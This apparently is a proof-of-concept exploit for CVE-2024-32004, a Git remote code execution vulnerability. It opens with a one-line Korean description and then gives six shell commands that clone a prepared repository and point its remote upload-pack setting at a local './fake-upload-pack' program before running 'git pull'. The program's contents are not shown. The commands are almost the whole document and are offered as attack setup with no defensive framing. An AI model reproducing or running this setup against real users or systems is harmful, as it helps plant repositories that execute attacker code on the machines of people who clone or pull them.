
Git 원격 코드 실행 취약점인 CVE-2024-32004에 대한 개념 증명 익스플로잇으로, 악성 upload-pack 필터를 통한 악용을 시연합니다.
git init tmp
git -C tmp config uploadpack.allowfilter 1
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
git pull